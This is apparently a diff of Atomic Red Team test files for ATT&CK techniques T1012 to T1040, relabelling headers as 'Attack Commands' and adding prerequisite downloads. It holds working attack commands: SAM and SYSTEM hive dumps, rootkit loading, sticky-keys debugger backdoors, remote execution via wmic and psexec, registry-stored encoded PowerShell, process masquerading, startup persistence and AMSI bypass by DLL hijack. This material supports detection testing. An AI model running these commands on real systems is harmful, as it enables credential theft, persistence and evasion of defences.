@@ -31,4 +32,7 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #
<br/>
atomics/T1012/T1012.md
+6 -2
View File
@@ -28,7 +28,8 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
powershell.exe New-Item -ItemType Directory -Name ART1012 -Path $env:USERPROFILE\AppData\Local\Temp\
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
@@ -55,10 +56,13 @@ reg save HKLM\System $env:USERPROFILE\AppData\Local\Temp\ART1012\system.hive"
reg save HKLM\SAM $env:USERPROFILE\AppData\Local\Temp\ART1012\sam.hive"
```
#### Cleanup Commands:
```
rmdir /q /s $env:USERPROFILE\AppData\Local\Temp\ART1012\
```
<br/>
atomics/T1014/T1014.md
+18 -6
View File
@@ -21,18 +21,22 @@ Loadable Kernel Module based Rootkit
**Supported Platforms:** Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| rootkit_file | Path To Module | String | Module.ko|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
sudo insmod #{rootkit_file}
```
<br/>
<br/>
@@ -42,18 +46,22 @@ Loadable Kernel Module based Rootkit
**Supported Platforms:** Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| rootkit_file | Path To Module | String | Module.ko|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
sudo modprobe #{rootkit_file}
```
<br/>
<br/>
@@ -70,16 +78,20 @@ It would be wise if you only run this in a test environment
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| driver_path | Path to the vulnerable driver | Path | C:\Drivers\driver.sys|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
puppetstrings #{driver_path}
```
<br/>
atomics/T1015/T1015.md
+28 -7
View File
@@ -43,7 +43,7 @@ This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | osk.exe|
@@ -70,6 +70,9 @@ ELSE
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
```
<br/>
<br/>
@@ -79,7 +82,7 @@ This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | sethc.exe|
@@ -106,6 +109,9 @@ ELSE
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f
```
<br/>
<br/>
@@ -115,7 +121,7 @@ This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | utilman.exe|
@@ -142,6 +148,9 @@ ELSE
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /f
```
<br/>
<br/>
@@ -151,7 +160,7 @@ This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | magnify.exe|
@@ -178,6 +187,9 @@ ELSE
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /f
```
<br/>
<br/>
@@ -187,7 +199,7 @@ This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | narrator.exe|
@@ -214,6 +226,9 @@ ELSE
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger /f
```
<br/>
<br/>
@@ -223,7 +238,7 @@ This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | DisplaySwitch.exe|
@@ -250,6 +265,9 @@ ELSE
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /f
```
<br/>
<br/>
@@ -259,7 +277,7 @@ This allows adversaries to execute the attached process
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | atbroker.exe|
@@ -286,4 +304,7 @@ ELSE
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger /f
```
<br/>
atomics/T1016/T1016.md
+20 -4
View File
@@ -23,7 +23,8 @@ Identify network configuration information
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
ipconfig /all
netsh interface show
@@ -34,6 +35,9 @@ net config
<br/>
<br/>
@@ -43,13 +47,17 @@ Enumerates Windows Firewall Rules using netsh.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
netsh advfirewall firewall show rule name=all
```
<br/>
<br/>
@@ -59,7 +67,8 @@ Identify network configuration information
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
arp -a
netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
@@ -68,6 +77,9 @@ ifconfig
<br/>
<br/>
@@ -77,7 +89,8 @@ Identify network configuration information as seen by Trickbot and described her
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
ipconfig /all
net config workstation
@@ -87,4 +100,7 @@ nltest /domain_trusts
<br/>
atomics/T1018/T1018.md
+41 -9
View File
@@ -46,7 +46,8 @@ Identify remote systems with net.exe
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
net view /domain
net view
@@ -54,6 +55,9 @@ net view
<br/>
<br/>
@@ -63,13 +67,17 @@ Identify remote systems with net.exe querying the Active Directory Domain Comput
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
net group "Domain Computers" /domain
```
<br/>
<br/>
@@ -79,18 +87,22 @@ Identify domain controllers for specified domain.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_domain | Domain to query for domain controllers | String | domain.local|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
nltest.exe /dclist:#{target_domain}
```
<br/>
<br/>
@@ -100,13 +112,17 @@ Identify remote systems via ping sweep
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
```
<br/>
<br/>
@@ -116,13 +132,17 @@ Identify remote systems via arp
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
arp -a
```
<br/>
<br/>
@@ -132,13 +152,17 @@ Identify remote systems via arp
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
arp -a | grep -v '^?'
```
<br/>
<br/>
@@ -148,13 +172,17 @@ Identify remote systems via ping sweep
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
```
<br/>
<br/>
@@ -164,7 +192,8 @@ Powershell script that runs nslookup on cmd.exe against the local /24 network of
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
$pieces = $localip.split(".")
@@ -176,4 +205,7 @@ foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.
<br/>
atomics/T1022/T1022.md
+42 -5
View File
@@ -23,7 +23,8 @@ Encrypt data for exiltration
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
mkdir /tmp/victim-files
cd /tmp/victim-files
@@ -46,6 +47,9 @@ which gpg
rm -Rf /tmp/victim-files
```
<br/>
<br/>
@@ -56,7 +60,8 @@ rar a -p"blue" hello.rar (VARIANT)
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
mkdir .\tmp\victim-files
cd .\tmp\victim-files
@@ -67,6 +72,9 @@ dir
<br/>
<br/>
@@ -77,18 +85,43 @@ wzzip sample.zip -s"blueblue" *.txt (VARIANT)
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| winzip_exe | Path to installed Winzip executable | Path | %ProgramFiles%\WinZip\winzip64.exe|
| winzip_url | Path to download Windows Credential Editor zip file | URL | https://download.winzip.com/gl/nkln/winzip24-home.exe|
| winzip_hash | File hash of the Windows Credential Editor zip file | String | B59DB592B924E963C21DA8709417AC0504F6158CFCB12FE5536F4A0E0D57D7FB|
#### Attack Commands: Run with `command_prompt`!
```
path=%path%;"C:\Program Files (x86)\winzip"
mkdir .\tmp\victim-files
cd .\tmp\victim-files
echo "This file will be encrypted" > .\encrypted_file.txt
winzip32 -min -a -s"hello" archive.zip *
"#{winzip_exe}" -min -a -s"hello" archive.zip *
dir
```
#### Dependencies: Run with `powershell`!
##### Description: Winzip must be installed
##### Check Prereq Commands:
```
cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)'
```
##### Get Prereq Commands:
```
if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
Write-Host Follow the installation prompts to continue
cmd /c "$env:Temp\winzip.exe"
}
```
<br/>
<br/>
@@ -98,7 +131,8 @@ Note: Requires 7zip installation
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
mkdir $PathToAtomicsFolder\T1022\victim-files
cd $PathToAtomicsFolder\T1022\victim-files
@@ -109,4 +143,7 @@ dir
<br/>
atomics/T1022/T1022.yaml
+28 -1
View File
@@ -49,6 +49,33 @@ atomic_tests:
wzzip sample.zip -s"blueblue" *.txt (VARIANT)
supported_platforms:
- windows
input_arguments:
winzip_exe:
description: Path to installed Winzip executable
type: Path
default: "%ProgramFiles%\\WinZip\\winzip64.exe"
winzip_url:
description: Path to download Windows Credential Editor zip file
type: url
default: https://download.winzip.com/gl/nkln/winzip24-home.exe
winzip_hash:
description: File hash of the Windows Credential Editor zip file
type: String
default: B59DB592B924E963C21DA8709417AC0504F6158CFCB12FE5536F4A0E0D57D7FB
dependency_executor_name: powershell
dependencies:
- description: |
Winzip must be installed
prereq_command: |
cmd /c 'if not exist "#{winzip_exe}" (echo 1) else (echo 0)'
get_prereq_command: |
if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
Write-Host Follow the installation prompts to continue
cmd /c "$env:Temp\winzip.exe"
}
executor:
name: command_prompt
elevation_required: false
@@ -57,7 +84,7 @@ atomic_tests:
mkdir .\tmp\victim-files
cd .\tmp\victim-files
echo "This file will be encrypted" > .\encrypted_file.txt
winzip32 -min -a -s"hello" archive.zip *
"#{winzip_exe}" -min -a -s"hello" archive.zip *
dir
- name: Compress Data and lock with password for Exfiltration with 7zip
atomics/T1023/T1023.md
+12 -4
View File
@@ -18,18 +18,22 @@ gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-Strin
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| shortcut_file_path | shortcut modified and execute | path | shortcutname.url|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} && #{shortcut_file_path}
```
<br/>
<br/>
@@ -39,7 +43,8 @@ LNK file to launch CMD placed in startup folder
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk")
@@ -58,11 +63,14 @@ $ShortCut.Description = "T1023.";
$ShortCut.Save()
```
#### Cleanup Commands:
```
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk"
Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1023.lnk"
```
<br/>
atomics/T1027/T1027.md
+18 -6
View File
@@ -27,7 +27,8 @@ Creates a base64-encoded data file and decodes it into an executable shell scrip
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
@@ -37,6 +38,9 @@ chmod +x /tmp/art.sh
<br/>
<br/>
@@ -46,12 +50,13 @@ Creates base64-encoded PowerShell code and executes it. This is used by numerous
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
@@ -63,6 +68,9 @@ powershell.exe -EncodedCommand $EncodedCommand
<br/>
<br/>
@@ -72,14 +80,15 @@ Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates i
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
| registry_key_storage | Windows Registry Key to store code | String | HKCU:Software\Microsoft\Windows\CurrentVersion|
| registry_entry_storage | Windows Registry entry to store code under key | String | Debug|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
@@ -90,10 +99,13 @@ Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_sto
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"
```
#### Cleanup Commands:
```
Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_entry_storage}
```
<br/>
atomics/T1028/T1028.md
+29 -9
View File
@@ -23,13 +23,17 @@ Powershell Enable WinRM
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
Enable-PSRemoting -Force
```
<br/>
<br/>
@@ -43,18 +47,22 @@ https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-applicatio
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Name of Computer | string | computer1|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
```
<br/>
<br/>
@@ -64,20 +72,24 @@ Utilize WMIC to start remote process
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username | String | DOMAIN\Administrator|
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | Target|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
```
<br/>
<br/>
@@ -87,20 +99,24 @@ Utilize psexec to start remote process
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username | String | DOMAIN\Administrator|
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | Target|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
psexec \\host -u domain\user -p password -s cmd.exe
```
<br/>
<br/>
@@ -110,17 +126,21 @@ Execute Invoke-command on remote host
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| host_name | Remote Windows Host Name | String | Test|
| remote_command | Command to execute on remote Host | String | ipconfig|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
```
<br/>
atomics/T1030/T1030.md
+6 -2
View File
@@ -12,10 +12,11 @@
## Atomic Test #1 - Data Transfer Size Limits
Take a file/directory, split it into 5Mb chunks
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
cd /tmp/
dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
@@ -25,4 +26,7 @@ ls -l
<br/>
atomics/T1030/T1030.yaml
-2
View File
@@ -9,8 +9,6 @@ atomic_tests:
supported_platforms:
- macos
- centos
- ubuntu
- linux
executor:
atomics/T1031/T1031.md
+6 -2
View File
@@ -20,16 +20,20 @@ and will then revert the binPath change, restoring Fax to its original state.
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\""
sc start Fax
```
#### Cleanup Commands:
```
sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe"
```
<br/>
atomics/T1033/T1033.md
+11 -3
View File
@@ -27,12 +27,13 @@ Identify System owner or users on an endpoint
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Name of remote computer | string | computer1|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
cmd.exe /C whoami
wmic useraccount get /ALL
@@ -46,6 +47,9 @@ for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active
<br/>
<br/>
@@ -55,7 +59,8 @@ Identify System owner or users on an endpoint
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
users
w
@@ -64,4 +69,7 @@ who
<br/>
atomics/T1035/T1035.md
+26 -8
View File
@@ -17,13 +17,14 @@ Creates a service specifying an aribrary command and executes it. When executing
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| service_name | Name of service to create | string | ARTService|
| executable_command | Command to execute as a service | string | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
sc.exe create #{service_name} binPath= #{executable_command}
sc.exe start #{service_name}
@@ -32,6 +33,9 @@ sc.exe delete #{service_name}
<br/>
<br/>
@@ -42,21 +46,35 @@ Will run a command on a remote host
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| psexec_path | Path to PsExec | string | C:\PSTools\PsExec.exe|
| psexec_exe | Path to PsExec | string | C:\PSTools\PsExec.exe|
| remote_host | Remote hostname or IP address | string | localhost|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
#{psexec_path} \\#{remote_host} "C:\Windows\System32\calc.exe"
#{psexec_exe} \\#{remote_host} "C:\Windows\System32\calc.exe"
```
#### Commands to Check Prerequisites:
#### Dependencies: Run with `powershell`!
##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
##### Check Prereq Commands:
```
if(Test-Path #{psexec_path}) {0} else {1}
if (Test-Path "#{psexec_exe}"") {0} else {1}
```
##### Get Prereq Commands:
```
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null
Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
```
<br/>
atomics/T1035/T1035.yaml
+14 -4
View File
@@ -32,7 +32,7 @@ atomic_tests:
supported_platforms:
- windows
input_arguments:
psexec_path:
psexec_exe:
description: Path to PsExec
type: string
default: "C:\\PSTools\\PsExec.exe"
@@ -40,10 +40,20 @@ atomic_tests:
description: Remote hostname or IP address
type: string
default: localhost
dependencies:
- description: |
PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
prereq_command: |
if (Test-Path "#{psexec_exe}"") {0} else {1}
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null
Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
executor:
name: powershell
elevation_required: false
prereq_command: |
if(Test-Path #{psexec_path}) {0} else {1}
command: |
#{psexec_path} \\#{remote_host} "C:\Windows\System32\calc.exe"
#{psexec_exe} \\#{remote_host} "C:\Windows\System32\calc.exe"
atomics/T1036/T1036.md
+49 -17
View File
@@ -45,18 +45,22 @@ Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsas
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
cmd.exe /c %SystemRoot%\Temp\lsass.exe
```
#### Cleanup Commands:
```
del /Q /F %SystemRoot%\Temp\lsass.exe
```
<br/>
<br/>
@@ -66,7 +70,8 @@ Copies sh process, renames it as crond, and executes it to masquerade as the cro
**Supported Platforms:** Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
cp /bin/sh /tmp/crond
/tmp/crond
@@ -74,6 +79,9 @@ cp /bin/sh /tmp/crond
<br/>
<br/>
@@ -83,18 +91,22 @@ Copies cscript.exe, renames it, and launches it to masquerade as an instance of
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y
cmd.exe /c %APPDATA%\notepad.exe /B
```
#### Cleanup Commands:
```
del /Q /F %APPDATA%\notepad.exe
```
<br/>
<br/>
@@ -104,18 +116,22 @@ Copies wscript.exe, renames it, and launches it to masquerade as an instance of
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y
cmd.exe /c %APPDATA%\svchost.exe /B
```
#### Cleanup Commands:
```
del /Q /F %APPDATA%\svchost.exe
```
<br/>
<br/>
@@ -125,18 +141,22 @@ Copies powershell.exe, renames it, and launches it to masquerade as an instance
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y
cmd.exe /K %APPDATA%\taskhostw.exe
```
#### Cleanup Commands:
```
del /Q /F %APPDATA%\taskhostw.exe
```
<br/>
<br/>
@@ -146,25 +166,29 @@ Copies an exe, renames it as a windows exe, and launches it to masquerade as a r
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inputfile | path of file to copy | path | $PathToAtomicsFolder\T1036\bin\t1036.exe|
| outputfile | path of file to execute | path | ($env:TEMP + "\svchost.exe")|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
copy #{inputfile} #{outputfile}
$myT1036 = (Start-Process -PassThru -FilePath #{outputfile}).Id
Stop-Process -ID $myT1036
```
#### Cleanup Commands:
```
del #{outputfile}
```
<br/>
<br/>
@@ -174,25 +198,29 @@ Copies a windows exe, renames it as another windows exe, and launches it to masq
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| inputfile | path of file to copy | path | $env:ComSpec|
| outputfile | path of file to execute | path | ($env:TEMP + "\svchost.exe")|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
copy #{inputfile} #{outputfile}
$myT1036 = (Start-Process -PassThru -FilePath #{outputfile}).Id
Stop-Process -ID $myT1036
```
#### Cleanup Commands:
```
del #{outputfile}
```
<br/>
<br/>
@@ -203,17 +231,21 @@ This works by copying cmd.exe to a file, naming it lsm.exe, then copying a file
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
copy C:\Windows\System32\cmd.exe C:\lsm.exe
C:\lsm.exe /c echo T1036 > C:\T1036.txt
```
#### Cleanup Commands:
```
del C:\T1036.txt
del C:\lsm.exe
```
<br/>
atomics/T1037/T1037.md
+20 -8
View File
@@ -29,19 +29,19 @@ Adds a registry value to run batch script created in the C:\Windows\Temp directo
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_path | Path to .bat file | String | $env:SystemRoot\Temp\art.bat|
| script_command | Command To Execute | String | echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037-log.txt|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
echo cmd /c "#{script_command}" > #{script_path}
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}"
```
#### Cleanup Commands:
```
REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f
@@ -49,6 +49,10 @@ del #{script_path}
del "%USERPROFILE%\desktop\T1037-log.txt"
```
<br/>
<br/>
@@ -72,7 +76,6 @@ New-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1037.b
Set-Content "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1037.bat" "cmd /c #{system_command}"
```
#### Cleanup Commands:
```
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1037.bat"
@@ -80,6 +83,10 @@ Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T103
Remove-Item "$env:USERPROFILE\desktop\T1037-log.txt"
```
<br/>
<br/>
@@ -89,19 +96,23 @@ Run an exe on user logon or system startup
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
schtasks /create /tn "T1037_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1037_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
```
#### Cleanup Commands:
```
schtasks /delete /tn "T1037_OnLogon" /f
schtasks /delete /tn "T1037_OnStartup" /f
```
<br/>
<br/>
@@ -111,8 +122,7 @@ Mac logon script
**Supported Platforms:** macOS
#### Run it with these steps!
1. Create the required plist file
#### Run it with these steps! 1. Create the required plist file
sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist
@@ -132,4 +142,6 @@ Mac logon script
<br/>
atomics/T1038/T1038.md
+6 -2
View File
@@ -25,18 +25,22 @@ https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
%APPDATA%\updater.exe -Command exit
```
#### Cleanup Commands:
```
del %APPDATA%\updater.exe
del %APPDATA%\amsi.dll
```
<br/>
atomics/T1040/T1040.md
+24 -8
View File
@@ -25,12 +25,13 @@ Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be in
